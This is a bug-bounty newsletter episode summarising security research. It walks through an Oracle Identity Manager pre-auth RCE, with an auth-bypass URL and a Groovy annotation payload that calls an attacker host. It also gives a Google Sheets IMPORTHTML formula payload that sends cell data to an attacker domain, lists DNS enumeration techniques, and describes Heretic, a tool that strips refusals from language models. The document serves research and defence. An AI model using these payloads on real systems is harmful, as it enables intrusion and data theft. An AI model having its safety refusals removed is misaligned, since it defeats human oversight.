[HackerNotes Ep. 150] ASP.NET MVC Patterns, Popping Oracle Identity, and Truly Lesser-known Subdomain Enumeration Techniques

In this episode: we're highlighting some cool news and research, but not before expressing our gratitude to the Hacker community. We are so thankful for you all!

Author

Yujilik
November 27, 2025

Hacker TL;DR

  • Breaking Oracle’s Identity Manager: Pre-Auth RCE (CVE-2025-61757):

    Global SecurityFilter rules in web.xml using a .wadl regex on getRequestURI() could be bypassed with matrix params like ;.wadl, exposing unauthenticated access to OIM’s REST APIs. Hitting the Groovy script compilation endpoint and abusing annotation execution at compile-time turns a “non-executing” compiler into a pre-auth RCE primitive.

  • Who Needs a Blind XSS?:

    Formula payloads like =IMPORTHTML("https://{id}.attacker.com/log?v=" & CONCATENATE(A1:E1), "table", 1) only execute once user-controlled data reached Google Sheets via CSV exports or automations, not at ingestion. Any path that can land unescaped =prefixed text in a spreadsheet should be treated as a blind, delayed execution surface.

  • Lesser known techniques for large-scale subdomain enum:

    Empty Non-Terminals returning NOERROR/NODATA reveal which DNS branches are alive and worth deeper probing, while NSEC/NSEC3 records plus tools like ldns-walk and nsec3map enable zone reconstruction. ICANN CZDS zone files for gTLDs give you entire TLD maps up front.

  • Heretic - Fully automatic censorship removal for language models:

    Heretic uses Optuna to find weight tweaks that make the model refuse less on “harmful” prompts while keeping its answers on normal prompts very close to the original.

With ThreatLocker® Elevation Control, you eliminate unnecessary admin rights without slowing anyone down.

Traditional privilege management forces users into full admin accounts or constant credential prompts. Elevation Control replaces that chaos with application-centric, policy-driven control that gives IT teams precision and keeps attackers locked out.

  • ✓ Remove local admin rights from users without breaking workflows

  • ✓ Elevate only the applications that need it — not the user

  • ✓ Granular, policy-based elevation by app, user, group, or device

  • ✓ “Just-in-time” elevation with automatic expiry

  • ✓ Integrated approval workflows and UAC replacement for seamless requests

Keep users productive while cutting off one of the most abused attack surfaces in the enterprise.

Start taking back control, one application at a time.

HACKERNOTES;

The episode started with Rhyno and rez0 talking about Thanksgiving, so it felt like a good moment to drop a quick note here too.

The CTBB team really appreciates every single one of you who keep reading HackerNotes, watching the pod, sharing research, helping each other, keeping the community alive and interesting.

Everything we’ve built only works because people like you show up, contribute, and make this space actually worth being in.

Thanks for being here with us and pushing the whole thing forward!

If you’re thankful for something you want to share, send a message in the #pod-talk channel!

Breaking Oracle’s Identity Manager: Pre-Auth RCE (CVE-2025-61757)

Searchlight Cyber’s research into CVE-2025-61757 shows a full pre-auth RCE chain inside Oracle Identity Manager. Once they extracted the OIM source (a maze of EARs → WARs → JARs), they anchored themselves by searching for known UI paths like identity/faces/helppages/main.jspx and worked inward from there.

The dangerous surface came from OIM’s REST management APIs. Many endpoints looked unauthenticated in code but returned 401. The mismatch came from a classic enterprise Java anti-pattern: a global SecurityFilter defined in web.xml, not attached to individual routes. These filters rely on brittle regex whitelists rather than route-level auth. The simplified key rule: *WADL_PATTERN = /\\.wadl.*$/i*

If the request URI matched .wadl, the filter let the request through. Because getRequestURI() includes path parameters, appending a matrix param—rather than a query param—bypassed auth cleanly: /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl

With the filter bypassed, the most interesting target was the Groovy script compilation endpoint. It compiles user-controlled Groovy, but doesn’t execute it. The trick is recognizing that Groovy sits on top of Java, and Java annotation processors execute at compile time, outside the runtime’s security model.

By embedding an annotation like: 

@ASTTest(phase = SEMANTIC_ANALYSIS, value = {
    new URL("<https://attacker>").openConnection().getInputStream()
})

The annotation’s code executes during Groovy’s compilation phase — giving full outbound-capable RCE.

In short, the chain is:

  1. Central SecurityFilter → .wadl regex → path parameter → full auth bypass

  2. Reach Groovy compilation endpoint

  3. Inject annotation-based code → executed during compile → pre-auth RCE

hx01, Sajeeb, and Eric (Todayisnew) took a closer look at something most workflows take for granted: how spreadsheets handle untrusted text. Their test payload used Google Sheets’ IMPORTHTML(): 

=IMPORTHTML("https://{subdomain-with-payload-id}.our-server.com/log?v=" & CONCATENATE(A1:E1), "table", 1)

Each submission got its own {subdomain-with-payload-id}. When the formula eventually executed inside Google Sheets, Sheets sent an HTTP request to that unique subdomain, with v= set to CONCATENATE(A1:E1) (a fingerprint of the header row). That proved execution, timing, and basic sheet structure — without touching actual user data.

The important part: nothing happened at ingestion. Email and form submissions alone did nothing. Execution only occurred later when internal workflows pushed the data into Sheets:

  • Employees exporting CSVs from CRMs like Salesforce, Zendesk, HubSpot and then uploading them into Sheets.

  • Automation tools like Zapier, Workato, or custom integrations inserting rows directly into Sheets.

From there they saw callbacks across support pipelines, privacy tracking, advertising intake, membership onboarding, and even a bug bounty live hacking event intake form wired straight into a spreadsheet.

The behaviour is Blind-XSS-like: delayed, blind execution somewhere deep in the org. But there’s no browser or DOM — the execution environment is Google Sheets interpreting values that start with =.

The core lesson from the research is blunt: if user-controlled text can land in a spreadsheet without formula escaping, assume it can execute. And because these CSV → Sheets flows are usually built by non-technical teams via CRMs and no-code tools, they almost never get treated as part of the attack surface.

We got quite a few new things over at the Critical Research Lab.

FSI dropped a research on ASP.NET MVC View Engine Search Patterns and 7urb0 is posting an XSS miniseries that will finish next monday, so stay tuned!

Direct links:

And if you got something cool to share, please check the official page to learn how to submit your research!

Heretic: Fully automatic censorship removal for language models

Heretic builds on recent “abliteration” work and pushes it further aiming to remove refusals while keeping the model as close as possible to its original quality.

It builds on prior abliteration research but automates the whole process using directional ablation plus a parameter optimiser powered by Optuna.

It optimises two metrics at the same time:

  • Reduce refusals for harmful prompts

  • Minimise divergence from the original model on harmless prompts

1. ENTs & NOERROR

DNS has a middle state most enum tools ignore: Empty Non-Terminals, nodes with no records but existing descendants.

They return NOERROR/NODATA, which silently reveals deeper hierarchy.

  • It tells you which branches actually lead somewhere

  • It exposes hidden subtrees where MX/TXT/SRV/CNAME records may live

  • It prevents wasting time fuzzing dead paths

2. NSEC / NSEC3 Zone Walking

Classic NSEC DNSSEC records act like a linked list: each record points to the next valid name in the zone, which makes full enumeration trivial via tools like ldns-walk.

Modern NSEC3 hides names by hashing but the hashes are still collectible and crackable offline:

  • Query random non-existent names → collect hashed labels

  • Use tools like nsec3map to brute/lookup those hashes

  • Reconstruct the zone structure without direct NSEC leaks

3. ICANN CZDS

ICANN’s Centralized Zone Data Service hands out full zone files for hundreds of participating gTLDs.

If a target uses a niche or vanity gTLD, you can often pull:

  • Every domain under that TLD

  • All second-level names

  • Immediate enumeration starting points

Google dropped Gemini 3 during the same week with unusually large benchmark jumps compared to the model-to-model incremental improvements of the last year. You can run it free at AI.dev with “thinking” enabled.

Alongside the model release, Google relaunched the Windsurf code-generation environment as Antigravity, a VS Code fork with full agentic code editing capabilities, free for now.

AssetNote’s original Surf takes a domain list, probes for reachable hosts, and outputs all non-HTTP/S-addressable hosts.

Justin and Émile rewrote the functionality as a plugin for Caido!

Our friend Vitor (busfactor) created a page which is like a reading list with hacking related articles the finds around.

If you’re like us and likes reading cool things on your free time, check out his page!

That’s it for the week,

and as always, keep hacking!